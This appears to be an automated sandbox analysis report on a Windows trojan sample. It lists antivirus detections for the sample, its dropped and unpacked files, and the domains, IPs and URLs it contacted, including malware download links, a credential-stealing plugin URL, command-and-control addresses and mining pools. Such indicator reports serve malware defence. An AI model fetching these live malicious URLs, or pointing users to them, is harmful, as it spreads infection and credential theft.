Source | Detection | Scanner | Label
U3E7zMaux2.exe | 41% | Virustotal |
U3E7zMaux2.exe | 46% | ReversingLabs | Win32.Trojan.CrypterX
U3E7zMaux2.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\8EC4.exe | 100% | Avira | HEUR/AGEN.1211353
C:\Users\user\AppData\Local\Temp\7801.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\8EC4.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\8ED5.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\9A02.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\86C4.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\7CA1.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll | 0% | ReversingLabs |
C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll | 0% | ReversingLabs |
C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll | 3% | Metadefender |
C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll | 0% | ReversingLabs |
C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll | 0% | ReversingLabs |
C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll | 0% | ReversingLabs |
C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll | 2% | ReversingLabs |
C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll | 0% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
40.0.8EC4.exe.400000.10.unpack | 100% | Avira | HEUR/AGEN.1145065
43.3.7801.exe.4d60000.2.unpack | 100% | Avira | TR/Crypt.EPACK.Gen2
14.0.D984.exe.620e50.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
43.2.7801.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1127993
40.0.8EC4.exe.610000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
21.2.86C4.exe.540e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
14.0.D984.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
22.0.8EC4.exe.fa0000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
40.0.8EC4.exe.400000.6.unpack | 100% | Avira | HEUR/AGEN.1145065
19.2.E666.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
40.0.8EC4.exe.400000.8.unpack | 100% | Avira | HEUR/AGEN.1145065
21.3.86C4.exe.560000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
40.0.8EC4.exe.610000.9.unpack | 100% | Avira | HEUR/AGEN.1211353
12.0.uufaeea.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.2.U3E7zMaux2.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
40.2.8EC4.exe.610000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
19.0.E666.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
22.2.8EC4.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
36.2.lagavljy.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
14.2.D984.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.0.E666.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
40.0.8EC4.exe.610000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
1.0.U3E7zMaux2.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.2.7CA1.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.0.uufaeea.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
40.0.8EC4.exe.610000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
22.0.8EC4.exe.fa0000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
1.1.U3E7zMaux2.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
40.0.8EC4.exe.610000.11.unpack | 100% | Avira | HEUR/AGEN.1211353
19.1.E666.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
14.3.D984.exe.630000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.E666.exe.5415a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
20.2.7CA1.exe.570e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
14.0.D984.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
40.0.8EC4.exe.610000.7.unpack | 100% | Avira | HEUR/AGEN.1211353
19.0.E666.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.U3E7zMaux2.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
22.0.8EC4.exe.fa0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
36.3.lagavljy.exe.490000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
36.2.lagavljy.exe.650000.2.unpack | 100% | Avira | BDS/Backdoor.Gen
14.2.D984.exe.620e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
40.0.8EC4.exe.610000.5.unpack | 100% | Avira | HEUR/AGEN.1211353
40.0.8EC4.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1145065
12.1.uufaeea.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
40.2.8EC4.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1145065
39.2.svchost.exe.320000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
40.0.8EC4.exe.610000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
22.0.8EC4.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
11.2.uufaeea.4615a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
21.2.86C4.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
40.0.8EC4.exe.400000.12.unpack | 100% | Avira | HEUR/AGEN.1145065
0.2.U3E7zMaux2.exe.5315a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.0.uufaeea.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
40.0.8EC4.exe.610000.13.unpack | 100% | Avira | HEUR/AGEN.1211353
14.0.D984.exe.620e50.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
36.2.lagavljy.exe.470e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
20.3.7CA1.exe.590000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.0.U3E7zMaux2.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.uufaeea.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://tempuri.org/Entity/Id12Response | 0% | URL Reputation | safe
http://185.7.214.171:8080/6.php | 100% | URL Reputation | malware
http://tempuri.org/ | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id2Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id21Response | 0% | URL Reputation | safe
http://185.215.113.35/d2VxjasuwS/index.php?scr=1 | 13% | Virustotal |
http://185.215.113.35/d2VxjasuwS/index.php?scr=1 | 0% | Avira URL Cloud | safe
http://185.163.204.24/ | 4% | Virustotal |
http://185.163.204.24/ | 0% | Avira URL Cloud | safe
http://tempuri.org/Entity/Id15Response | 0% | URL Reputation | safe
https://api.ip.sb/ip | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id24Response | 0% | URL Reputation | safe
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | 16% | Virustotal |
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | 100% | Avira URL Cloud | malware
http://tempuri.org/Entity/Id5Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id10Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id8Response | 0% | URL Reputation | safe
http://data-host-coin-8.com/game.exe | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id13Response | 0% | URL Reputation | safe
http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d32 | 0% | Avira URL Cloud | safe
http://tempuri.org/Entity/Id22Response | 0% | URL Reputation | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
https://get.adob | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id18Response | 0% | URL Reputation | safe
http://185.215.113.35/d2VxjasuwS/plugins/cred.dll | 100% | Avira URL Cloud | malware
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id3Response | 0% | URL Reputation | safe
http://service.r | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
pool-fr.supportxmr.com | 91.121.140.167 | true | false | | high
unicupload.top | 54.38.220.85 | true | false | | high
host-data-coin-11.com | 93.189.42.167 | true | false | | high
patmushta.info | 8.209.67.104 | true | false | | high
cdn.discordapp.com | 162.159.130.233 | true | false | | high
privacy-tools-for-you-780.com | 93.189.42.167 | true | false | | high
microsoft-com.mail.protection.outlook.com | 40.93.212.0 | true | false | | high
goo.su | 104.21.38.221 | true | false | | high
transfer.sh | 144.76.136.153 | true | false | | high
a0621298.xsph.ru | 141.8.194.74 | true | false | | high
data-host-coin-8.com | 93.189.42.167 | true | false | | high
pool.supportxmr.com | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://185.7.214.171:8080/6.php | true | URL Reputation: malware | unknown
http://185.215.113.35/d2VxjasuwS/index.php?scr=1 | true | 13% Virustotal; Avira URL Cloud: safe | unknown
http://185.163.204.24/ | true | 4% Virustotal; Avira URL Cloud: safe | unknown
http://a0621298.xsph.ru/advert.msi | false | | high
http://a0621298.xsph.ru/9.exe | false | | high
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | true | 16% Virustotal; Avira URL Cloud: malware | unknown
http://a0621298.xsph.ru/45512.exe | false | | high
http://data-host-coin-8.com/game.exe | false | URL Reputation: safe | unknown
http://a0621298.xsph.ru/File.exe | false | | high
http://a0621298.xsph.ru/443.exe | false | | high
http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d32 | true | Avira URL Cloud: safe | unknown
http://185.215.113.35/d2VxjasuwS/plugins/cred.dll | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/ac/?q= | 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id12Response | 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/ | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id2Response | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1 | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id21Response | 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_real | 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence | 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id15Response | 8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey | 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp | false | | high
                                                                                                  https://api.ip.sb/ip8EC4.exe, 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA18EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://tempuri.org/Entity/Id24Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://support.google.com/chrome/?p=plugin_shockwave8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Entity/Id5Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id10Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/Renew8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://tempuri.org/Entity/Id8Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://support.google.com/chrome/?p=plugin_wmp8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentity8EC4.exe, 00000028.00000002.960931410.0000000002AF0000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://support.google.com/chrome/?p=plugin_java8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/06/addressingex8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ15108EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://support.google.com/chrome/?p=plugin_divx8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://tempuri.org/Entity/Id13Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA18EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA18EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2002/12/policy8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://tempuri.org/Entity/Id22Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001D.00000003.800561405.00000188AC37D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.800577498.00000188AC38E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.800720160.00000188AC3AF000.00000004.00000001.sdmpfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Issue8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://get.adob8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/spnego8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/sc8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://tempuri.org/Entity/Id18Response8EC4.exe, 00000028.00000002.960872652.0000000002A61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://service.real.com/realplayer/security/02062012_player/en/8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              high
https://disneyplus.com/legal.
